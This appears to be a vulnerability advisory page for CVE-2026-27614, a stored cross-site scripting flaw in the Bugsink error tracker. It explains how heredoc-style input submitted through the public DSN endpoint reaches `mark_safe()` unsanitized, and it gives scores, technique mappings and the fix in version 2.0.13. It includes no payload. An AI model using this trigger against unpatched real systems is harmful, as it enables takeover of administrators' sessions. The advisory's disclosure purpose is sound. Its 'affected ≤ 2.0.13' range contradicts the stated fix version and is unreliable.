Cyber Resilience

CVE-2026-27614

CriticalPublic PoC

Published: 25 February 2026

Published
25 February 2026
Modified
27 February 2026
KEV Added
Patch
CVSS Score v3.1 9.3 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
EPSS Score 0.0029 20.1th percentile
Risk Priority 70 floored blend · peak EPSS

Summary

CVE-2026-27614 is a critical-severity Cross-site Scripting (CWE-79) vulnerability in Bugsink Bugsink. Its CVSS base score is 9.3 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 20.1th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2026-27614 is a stored cross-site scripting (XSS) vulnerability (CWE-79) in Bugsink, a self-hosted error tracking tool, affecting versions prior to 2.0.13. The flaw occurs in the `_pygmentize_lines()` function in `theme/templatetags/issues.py` at lines 75-77, where a known quirk in Pygments causes it to return more lines than provided—particularly with Ruby heredoc-style input—leading to raw, unsanitized input lines. These lines are then passed unconditionally to `mark_safe()` at lines 111-113, allowing arbitrary JavaScript storage in an event submitted via a public DSN endpoint.

An unauthenticated attacker who can submit events to a Bugsink project—by knowing the DSN or accessing a client that uses it, and with the ingest endpoint reachable—can inject the JavaScript payload into the database. The payload executes only if an administrator explicitly views the affected Stacktrace in the web UI. Successful exploitation enables the attacker to run JavaScript in the administrator's browser, acting with that user's privileges within Bugsink. The CVSS v3.1 base score is 9.3 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N).

Bugsink version 2.0.13 addresses the vulnerability. Mitigation details are provided in the GitHub security advisory (GHSA-vp6q-7m36-pq3w), the release notes for version 2.0.13, and the fixing commit (e784d6aeb0d5f29b40c2779d2544c2b9ef097ee9).

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

Bugsink is a self-hosted error tracking tool. In versions prior to 2.0.13, an unauthenticated attacker who can submit events to a Bugsink project can store arbitrary JavaScript in an event. The payload executes only if a user explicitly views the…

more

affected Stacktrace in the web UI. When Pygments returns more lines than it was given (a known upstream quirk that triggers with Ruby heredoc-style input), `_pygmentize_lines()` in `theme/templatetags/issues.py:75-77` falls back to returning the raw input lines. `mark_safe()` at line 111-113 is then applied unconditionally - including to those unsanitized raw lines. Since DSN endpoints are public by Sentry protocol, no account is needed to inject. The payload sits in the database until an admin looks at the event. Successful exploitation requires that the attacker to be able to submit events to the project (i.e. knows the DSN or can access a client that uses it), the Bugsink ingest endpoint is reachable to the attacker, and an administrator explicitly views the crafted event in the UI. Under those conditions, the attacker can execute JavaScript in the administrator’s browser and act with that user’s privileges within Bugsink. Version 2.0.13 fixes the vulnerability.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.007 JavaScript Execution
Adversaries may abuse various implementations of JavaScript for execution.
Why these techniques?

Stored XSS via unauthenticated public DSN ingest endpoint (T1190) directly enables storage and subsequent browser execution of arbitrary JavaScript payload (T1059.007) when admin views the stacktrace, achieving high-impact admin session compromise.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-40162Same product: Bugsink Bugsink
CVE-2025-26907Shared CWE-79
CVE-2025-69084Shared CWE-79
CVE-2025-69048Shared CWE-79
CVE-2025-22567Shared CWE-79
CVE-2025-69324Shared CWE-79
CVE-2026-1841Shared CWE-79
CVE-2025-26588Shared CWE-79
CVE-2025-23850Shared CWE-79
CVE-2025-23643Shared CWE-79

Affected Assets

bugsink
bugsink
≤ 2.0.13

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

SI-2 mandates timely flaw remediation, directly addressing the pygments quirk and unconditional mark_safe() application that enables stored XSS in Bugsink events.

prevent

SI-15 filters information outputs like stacktraces in the web UI, preventing execution of injected JavaScript when administrators view affected events.

prevent

SI-10 validates event inputs submitted via the public DSN endpoint, reducing the risk of storing malicious JavaScript payloads exploiting the pygments quirk.

References